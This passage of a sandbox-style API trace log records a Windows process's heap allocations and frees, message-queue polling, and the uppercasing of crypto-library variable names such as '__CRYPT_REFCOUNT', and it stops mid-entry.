[0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0146.877] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0146.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0146.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0146.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0146.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0146.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0146.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0146.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0146.878] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0146.878] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0146.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0146.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0146.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0146.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0146.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0146.879] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0146.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0146.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0146.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.879] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0146.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0146.880] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0146.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0146.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0146.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0146.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0146.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0146.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0146.882] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0146.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0147.097] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.097] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0147.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0147.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0147.097] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0147.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0147.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0147.099] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0147.099] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0147.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.099] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0147.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0147.099] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0147.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0147.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0147.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0147.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0147.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0147.100] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.100] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0147.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0147.100] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0147.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0147.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0147.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0147.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0147.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0147.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0147.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0147.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0147.103] RtlAllocateHeap (HeapHandle=0x970000, 